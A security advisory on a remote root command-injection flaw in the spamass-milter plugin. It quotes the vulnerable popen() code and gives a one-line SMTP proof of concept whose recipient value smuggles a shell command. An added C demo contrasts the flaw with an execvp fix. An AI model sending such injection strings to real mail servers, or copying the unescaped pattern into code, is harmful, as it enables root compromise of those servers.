Apache Spamassassin Milter Plugin Remote Root Command Execution
Summary:
Description: The Spamassassin Milter plugin suffers from a remote root command execution vulnerability. Full exploit details provided.
Spamassassin Milter Plugin Remote Root Zeroday (BTW zerodays lurk in the
aka the postfix_joker advisory
March 07 2010 // if you read this 10 years later you are definitely
Greetz fly out to alex,andi,adize :D
+++ KEEP IT ULTRA PRIV8 +++
SpamAssassin is a mail filter which attempts to identify spam using
a variety of mechanisms including text analysis, Bayesian filtering,
DNS blocklists, and collaborative filtering databases.
SpamAssassin is a project of the Apache Software Foundation (ASF).

What is Postfix? It is Wietse Venema's mailer that started life at IBM
Research as an alternative to the widely-used Sendmail program.
Postfix attempts to be fast, easy to administer, and secure.
The outside has a definite Sendmail-ish flavor, but the inside is

spamass-milter is a little plugin for the Sendmail Milter (Mail Filter) library
that pipes all incoming mail (including things received by rmail/UUCP)
through SpamAssassin, a highly customizable spam filter.
Remote Code Execution Vulnerability
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Spamassassin Milter Plugin can be tricked into executing any command
as the root user remotely.

If spamass-milter is run with the expand flag (-x option), every envelope
recipient it receives is formatted into a shell command line of the form

    sendmail -bv "<recipient>" 2>&1

and handed to popen(), which runs it through /bin/sh. The attacker-supplied
recipient is never escaped: a double quote inside the address terminates
the quoted argument, and anything after it (a pipe, a semicolon, a
subshell) is parsed by the shell as further commands and executed with the
privileges of the milter process, which is root on the affected setup.

From spamass-milter-0.3.1 (-latest) Line 820:
    // Gets called once for each recipient
    // stores the first recipient in the spamassassin object and
    // stores all addresses and the number thereof (some redundancy)
    sfsistat
    mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
    {
        struct context *sctx = (struct context*)smfi_getpriv(ctx);
        SpamAssassin* assassin = sctx->assassin;
        ...
        debug(D_FUNC, "mlfi_envrcpt: enter");

        if (flag_expand)            /* only when -x was given */
        {
            /* open a pipe to sendmail so we can do address expansion */
            char *fmt="%s -bv \"%s\" 2>&1";   /* envrcpt[0] lands inside the quotes, unescaped */

    #if defined(HAVE_SNPRINTF)
            snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
    #else
            /* XXX possible buffer overflow here */ // is this a
            sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
    #endif
            debug(D_RCPT, "calling %s", buf);

    #if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
            rv = pthread_mutex_lock(&popen_mutex);
            if (rv)
                debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
    #endif
            p = popen(buf, "r");                 /* [1] */
            if (!p)
            {
                debug(D_RCPT, "popen failed(%s). Will not expand aliases", strerror(errno));
                assassin->expandedrcpt.push_back(envrcpt[0]);
            }
            ...

[1] the vulnerable popen() call: buf, with the raw recipient inside, is
    passed to /bin/sh -c.
Remote Root Exploit PoC through postfix
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

220 ownthabox ESMTP Postfix (Ubuntu)
rcpt to: root+:"|touch /tmp/foo"
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Postfix passes the RCPT TO argument through to the milter with the embedded
quote and pipe intact. Once that string is dropped into the -bv command
line, the shell sees the recipient end at the first embedded quote,
treats |touch /tmp/foo as the second command of a pipeline, and runs it as
the milter's user. The root-owned /tmp/foo confirms the command ran as
root. No authentication is needed: any host that can reach the SMTP port
and get as far as RCPT TO can trigger it.
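The following program is an added example (not code from the advisory or from spamass-milter) that puts the vulnerable popen() pattern next to the fork/execvp form that takes the shell out of the picture. It assumes echo as a stand-in for the sendmail binary so it runs anywhere, and uses a harmless variant of the PoC recipient (echo INJECTED in place of touch /tmp/foo); both are assumptions made for the example. classify() reports, for each strategy, whether the injected command ran or the recipient arrived as one literal argument.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Stand-in for the real SENDMAIL path (assumption for this example):
 * echo prints its argv, which shows whether the recipient reached the
 * program as one argument or was re-parsed by /bin/sh first. */
#define SENDMAIL "echo"

/* Constructed test input: the advisory's injection with echo instead of
 * touch, so nothing is written to disk when the command fires. */
#define EVIL_RCPT "root+:\"|echo INJECTED\""

/* Vulnerable pattern, as in mlfi_envrcpt(): recipient formatted into a
 * command line, then popen() == /bin/sh -c. Returns bytes captured or -1. */
int expand_via_popen(const char *rcpt, char *out, size_t outlen)
{
    char cmd[1024];
    FILE *p;
    size_t n;

    if (snprintf(cmd, sizeof cmd, "%s -bv \"%s\" 2>&1", SENDMAIL, rcpt)
            >= (int)sizeof cmd)
        return -1;                          /* would have been truncated */
    p = popen(cmd, "r");
    if (p == NULL)
        return -1;
    n = fread(out, 1, outlen - 1, p);
    out[n] = '\0';
    pclose(p);
    return (int)n;
}

/* Hardened form: fork and execvp() with an argv. No shell is involved, so
 * quotes, pipes and semicolons in rcpt are plain bytes of one argument.
 * stderr is folded into stdout to match the original 2>&1. */
int expand_via_exec(const char *rcpt, char *out, size_t outlen)
{
    int fds[2];
    pid_t pid;
    size_t n = 0;
    ssize_t r;

    if (pipe(fds) < 0)
        return -1;
    pid = fork();
    if (pid < 0) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    if (pid == 0) {
        char *argv[] = { SENDMAIL, "-bv", (char *)rcpt, NULL };
        close(fds[0]);
        dup2(fds[1], STDOUT_FILENO);
        dup2(fds[1], STDERR_FILENO);
        close(fds[1]);
        execvp(argv[0], argv);
        _exit(127);                         /* exec failed */
    }
    close(fds[1]);
    while (n < outlen - 1 &&
           (r = read(fds[0], out + n, outlen - 1 - n)) > 0)
        n += (size_t)r;
    out[n] = '\0';
    close(fds[0]);
    waitpid(pid, NULL, 0);
    return (int)n;
}

/* Run one strategy on EVIL_RCPT and classify the result:
 *   1  injected command ran (output is INJECTED, recipient text gone)
 *   0  recipient survived as a literal argument
 *  -1  nothing captured */
int classify(int use_shell)
{
    char out[512];
    int n = use_shell ? expand_via_popen(EVIL_RCPT, out, sizeof out)
                      : expand_via_exec(EVIL_RCPT, out, sizeof out);

    if (n <= 0)
        return -1;
    if (strstr(out, "INJECTED") != NULL && strstr(out, "root+:") == NULL)
        return 1;
    return strstr(out, EVIL_RCPT) != NULL ? 0 : -1;
}

int main(void)
{
    printf("popen  path: %s\n", classify(1) == 1 ? "injection fired" : "no injection");
    printf("execvp path: %s\n", classify(0) == 0 ? "recipient passed literally" : "unexpected");
    return 0;
}
```

The exec variant is the shape of fix to look for when auditing a milter or any other daemon that "expands" addresses: whether a subsequent check of the address is done or not, the address must never be parsed by a shell. Running the milter as an unprivileged user limits what an injection can do but does not remove it.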